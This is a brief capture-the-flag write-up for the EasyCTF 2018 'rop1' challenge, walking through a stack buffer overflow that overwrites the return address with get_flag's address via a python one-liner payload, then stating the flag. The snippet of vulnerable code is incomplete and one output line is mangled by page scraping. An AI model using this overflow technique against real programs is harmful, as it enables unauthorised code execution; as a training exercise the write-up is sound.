EasyCTF_2018: rop1

Category: Binary Exploitation Points: 120 Description:

Go to /problems/rop1 on the shell server and tell me whats in flag.txt.


We are given two relevant files, rop1 and rop1.c. This is also relatively easy, just get the address of the function,

0x00400646    1 17           sym.get_flag

and the buffer size,

void get_input()
    char inp[64];
    printf("You said: %s\n", inp);

Add 8 to it, and prepare your payload,

$ python -c "print('A' * 72 + '\x46\x06\x40\x00')" | ./rop1
You said: AAAAAAAAAA[email protected]
Segmentation fault (core dumped)

Therefore, the flag is easyctf{r0ps_and_h0ps}.